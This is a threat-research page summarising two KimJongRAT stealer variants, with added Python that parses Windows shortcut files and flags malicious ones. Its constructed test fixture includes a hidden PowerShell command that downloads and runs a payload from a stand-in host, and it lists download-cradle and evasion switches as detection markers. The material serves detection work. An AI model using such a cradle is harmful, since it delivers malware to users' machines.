Security Articles

Exploring a New KimJongRAT Stealer Variant and Its PowerShell Implementation

released on 2025-06-17 @ 08:39:07 PM
This article analyzes two new variants of the KimJongRAT stealer: a Portable Executable (PE) variant and a PowerShell implementation. Both variants use a multi-stage infection process that starts with a Windows shortcut (LNK) file which downloads a dropper from a content delivery network (CDN). The PE variant deploys a loader, a decoy PDF, and a text file, while the PowerShell variant deploys a decoy PDF and a ZIP archive containing scripts. Both variants gather victim information and browser data, including data from cryptocurrency-wallet browser extensions. The PowerShell variant focuses more heavily on cryptocurrency, searching for an extensive list of browser wallet extensions. The malware uses legitimate CDN services to mask its distribution and has evolved since its first appearance in 2013, indicating that its developers continue to update its capabilities.
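The first stage described above is a shortcut that launches a script host to fetch the next stage, so the cheapest triage point is the LNK file itself. The following is an added example, not code from the article it summarises: it parses the ShellLinkHeader and StringData of a .lnk per the public MS-SHLLINK layout (skipping the LinkTargetIDList and LinkInfo blocks), then applies generic heuristics for shortcuts that hide PowerShell behind a document icon and carry a download cradle. The sample shortcut bytes, the `cdn.example.invalid` host, the paths and the triage thresholds are all constructed for this example; none of them are indicators taken from the article.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# LinkFlags bits and constants from the MS-SHLLINK specification.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SHOWCOMMAND_OFFSET = 60          # HeaderSize+CLSID+LinkFlags+FileAttributes+3 timestamps+FileSize+IconIndex
SW_SHOWMINNOACTIVE = 7           # window starts minimised and unfocused; common in malicious shortcuts


@dataclass
class LnkFields:
    flags: int
    show_command: int
    name: Optional[str] = None
    relative_path: Optional[str] = None
    working_dir: Optional[str] = None
    arguments: Optional[str] = None
    icon_location: Optional[str] = None


def _read_string(data: bytes, off: int, unicode: bool):
    """StringData item: 2-byte CountCharacters, then the characters, no terminator."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    nbytes = count * 2 if unicode else count
    raw = data[off:off + nbytes]
    if len(raw) != nbytes:
        raise ValueError("truncated StringData")
    return raw.decode("utf-16-le" if unicode else "cp1252"), off + nbytes


def parse_lnk(data: bytes) -> LnkFields:
    """Validate the header, skip LinkTargetIDList/LinkInfo, and return the StringData fields."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (show_command,) = struct.unpack_from("<I", data, SHOWCOMMAND_OFFSET)
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        (link_info_size,) = struct.unpack_from("<I", data, off)
        off += link_info_size    # LinkInfoSize counts its own 4-byte field
    fields = LnkFields(flags=flags, show_command=show_command)
    unicode = bool(flags & IS_UNICODE)
    for bit, attr in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            value, off = _read_string(data, off, unicode)
            setattr(fields, attr, value)
    return fields


SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")
CRADLE_MARKERS = ("iwr", "invoke-webrequest", "downloadstring", "downloadfile",
                  "net.webclient", "start-bitstransfer", "certutil", "curl ")
EVASION_MARKERS = ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile",
                   "-ep bypass", "-executionpolicy bypass", "-enc", "-encodedcommand")


def triage_lnk(fields: LnkFields) -> list:
    """Generic heuristics for a shortcut that launches a script host to fetch a second stage."""
    findings = []
    target = (fields.relative_path or "").lower()
    args = (fields.arguments or "").lower()
    icon = (fields.icon_location or "").lower()
    if target.endswith(SCRIPT_HOSTS):
        findings.append("target is a script host: " + fields.relative_path)
    if any(m in args for m in CRADLE_MARKERS):
        findings.append("download cradle in arguments")
    if any(m in args for m in EVASION_MARKERS):
        findings.append("hidden/no-profile/encoded PowerShell switches")
    if icon and target.endswith(SCRIPT_HOSTS) and not icon.endswith(SCRIPT_HOSTS):
        findings.append("icon borrowed from another program (document decoy)")
    if fields.show_command == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window minimised at launch)")
    return findings


def build_sample_lnk(relative_path: str, arguments: str, icon_location: str,
                     show_command: int = 1) -> bytes:
    """Constructed fixture: a minimal Unicode .lnk with one ItemID and three StringData items."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 5) + b"\x1f\x00\x00" + b"\x00\x00"   # placeholder ItemID + TerminalID
    body = struct.pack("<H", len(id_list)) + id_list
    for text in (relative_path, arguments, icon_location):
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


# Constructed samples (not artefacts from the article): a shortcut that hides PowerShell behind a
# PDF-viewer icon and pulls a payload from a CDN-style host, and a plain Notepad shortcut.
SAMPLE_ARGS = ('-nop -w hidden -c "iwr https://cdn.example.invalid/d.bin -OutFile '
               '$env:TEMP\\d.exe; Start-Process $env:TEMP\\d.exe"')
SUSPICIOUS_LNK = build_sample_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                                  SAMPLE_ARGS, r"%ProgramFiles%\PdfViewer\viewer.exe",
                                  show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_sample_lnk(r"..\..\Windows\System32\notepad.exe", "", r"%windir%\System32\notepad.exe")

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_LNK), ("benign", BENIGN_LNK)):
        f = parse_lnk(blob)
        print(label, f.relative_path, f.arguments, triage_lnk(f), sep="\n  ")
```

Run it against a real shortcut with `parse_lnk(open(path, "rb").read())`; the parser stops after StringData, so ExtraData blocks (environment variables, tracker data) are ignored, which is enough for the command-line check but means a target expressed only through an EnvironmentVariableDataBlock will show up with no relative path.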